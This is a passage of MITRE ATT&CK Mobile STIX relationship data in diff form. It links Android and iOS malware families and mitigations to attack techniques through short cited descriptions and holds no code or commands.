2020." + } + ], + "modified": "2020-09-24T15:12:24.301Z", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) can obtain the device’s IMEM, ICCID, and MEID.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--506d657b-1634-442e-8179-7187f82feb3a", + "created": "2020-12-24T21:55:56.691Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:38:17.926Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has accessed the call logs.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d2d7476e-66a4-4d46-877c-6e80678bbb38", + "created": "2022-04-01T18:43:25.764Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "System partition integrity mechanisms, such as Verified Boot, can detect the unauthorized modification of system files.", + "modified": "2022-04-01T18:43:25.764Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1577a79c-5f70-41cc-95bd-2407cfd1acbd", + "type": "relationship", + "created": "2020-06-26T15:12:40.094Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET DEFENSOR ID", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:12:40.094Z", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) can abuse the accessibility service to perform actions on behalf of the user, including launching attacker-specified applications to steal data.(Citation: ESET DEFENSOR ID)", + "relationship_type": "uses", + "source_ref": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6f30b02b-5d88-453d-af1e-305a75bfaf87", + "type": "relationship", + "created": "2020-06-26T15:12:40.098Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET DEFENSOR ID", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:12:40.098Z", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) can retrieve a list of installed applications.(Citation: ESET DEFENSOR ID)", + "relationship_type": "uses", + "source_ref": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f6098dca-3a9e-4991-8d51-1310b12161b6", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) uses SMS for command and control.(Citation: Lookout-PegasusAndroid)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--97408547-bacd-4308-a8be-556e9ff04951", + "created": "2023-03-20T18:55:23.628Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:55:23.628Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4df6a22e-489f-400c-b953-cc53bfb708a3", + "type": "relationship", + "created": "2020-09-14T14:13:45.296Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-14T14:13:45.296Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507)’s iOS version can collect device information.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e269e6a2-a709-4aa1-a260-f3f0d0284056", + "type": "relationship", + "created": "2020-12-24T22:04:27.919Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:27.919Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has extracted messages from chat programs, such as WeChat.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--352fabc8-48fe-4190-92b3-49b00348bb22", + "created": "2019-03-11T15:13:40.454Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "TrendMicro-Anserver", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/", + "description": "Karl Dominguez. (2011, October 2). Android Malware Uses Blog Posts as C&C. Retrieved February 6, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) uses encrypted content within a blog site for part of its command and control. Specifically, the encrypted content contains URLs for other servers to be used for other aspects of command and control.(Citation: TrendMicro-Anserver)", + "modified": "2022-04-18T19:04:48.388Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--4bf6ba32-4165-42c1-b911-9c36165891c8", + "target_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c393fe8f-5708-40eb-ada9-6ca0d9b16c7d", + "created": "2023-03-15T16:34:51.794Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:34:51.794Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--e2c2249a-eb82-4614-8dd4-9c514dde65e2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--aeeadd6b-30d3-4b4f-ac61-fd0bc367b415", + "created": "2022-03-30T14:50:07.291Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation could detect unauthorized operating system modifications.", + "modified": "2022-03-30T14:50:07.291Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0bbe5936-04bf-4c9a-bb43-cd37f36c3349", + "created": "2020-10-29T19:01:13.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft MalLockerB", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:44:31.187Z", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) has registered to receive 14 different broadcast intents for automatically triggering malware payloads. (Citation: Microsoft MalLockerB)", + "relationship_type": "uses", + "source_ref": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3a8fea40-69ba-4cfe-b577-c3112a60887a", + "created": "2022-04-01T14:51:51.593Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be wary of granting applications dangerous or privacy-intrusive permissions, such as access to notifications. ", + "modified": "2022-04-01T14:51:51.593Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5a2bff26-f5e5-41f9-b3da-a558988ef3f3", + "type": "relationship", + "created": "2020-06-26T14:55:13.351Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T14:55:13.351Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) can collect a list of installed applications.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--32958f57-ad9b-4fe1-abf3-6f92df895014", + "type": "relationship", + "created": "2019-08-05T13:22:03.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.873Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) stores domain information and URL paths as hardcoded AES-encrypted, base64-encoded strings.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--19b95b83-bac0-455f-882f-0209abddb76f", + "created": "2022-04-05T20:11:35.619Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Applications that properly encrypt network traffic may evade some forms of AiTM behavior. ", + "modified": "2022-04-05T20:11:35.619Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b610c587-576a-40cc-9f76-6362455c8ff4", + "created": "2023-03-20T18:43:01.334Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:01.334Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--86170d29-0e41-44d0-94b0-de7d23718302", + "created": "2022-04-05T19:42:39.957Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android 12 Features", + "url": "https://developer.android.com/about/versions/12/features", + "description": "Google. (2022, April 4). Features and APIs Overview. Retrieved April 5, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "The `HIDE_OVERLAY_WINDOWS` permission was introduced in Android 12 allowing apps to hide overlay windows of type `TYPE_APPLICATION_OVERLAY` drawn by other apps with the `SYSTEM_ALERT_WINDOW` permission, preventing other applications from creating overlay windows on top of the current application.(Citation: Android 12 Features)", + "modified": "2022-04-05T19:51:47.956Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c3c0ff44-71bb-4774-a850-7b7c9dccb619", + "created": "2023-03-20T18:44:04.803Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:04.803Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c1512591-7440-4a69-93b9-fe439a4c197e", + "created": "2022-03-28T19:40:40.860Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-28T19:40:40.860Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c23d9eff-1d4e-479f-a114-acc535540a23", + "created": "2023-03-20T18:46:51.895Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:46:51.895Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3fd2785f-f0eb-4aa9-8a10-e1c9a88b372a", + "created": "2020-06-26T14:55:13.304Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[EventBot](https://attack.mitre.org/software/S0478) can display popups over running applications.(Citation: Cybereason EventBot)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a9689f2c-ad8f-4861-8cad-d78e07fd1530", + "type": "relationship", + "created": "2020-01-27T17:05:58.213Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.213Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain a list of installed applications.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cfa1d194-7401-46ba-bfed-5f311aeb22d3", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:54:13.685Z", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) stole contact list data stored both on the the phone and the SIM card.(Citation: Kaspersky-WUC)", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bd952153-4902-4fc4-8e2e-b7c7b8bad7f1", + "created": "2023-01-18T19:13:15.991Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:11:24.686Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) has code to use Firebase Cloud Messaging for receiving C2 instructions.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a76d731b-484c-442a-b1a3-255d8398aefd", + "type": "relationship", + "created": "2019-10-10T15:22:52.545Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-RCSAndroid", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + } + ], + "modified": "2019-10-10T15:22:52.545Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can collect passwords for Wi-Fi networks and online accounts, including Skype, Facebook, Twitter, Google, WhatsApp, Mail, and LinkedIn.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ce645a25-160f-443d-b288-fdd108b78a06", + "created": "2020-09-11T16:22:03.269Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/viperrat-mobile-apt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:41:00.652Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect the device’s call log.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d22f2c45-d6fa-419a-8f25-65ea37529ccc", + "created": "2019-09-04T14:28:15.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:19:04.639Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can retrieve calendar event information including the event name, when and where it is taking place, and the description.(Citation: 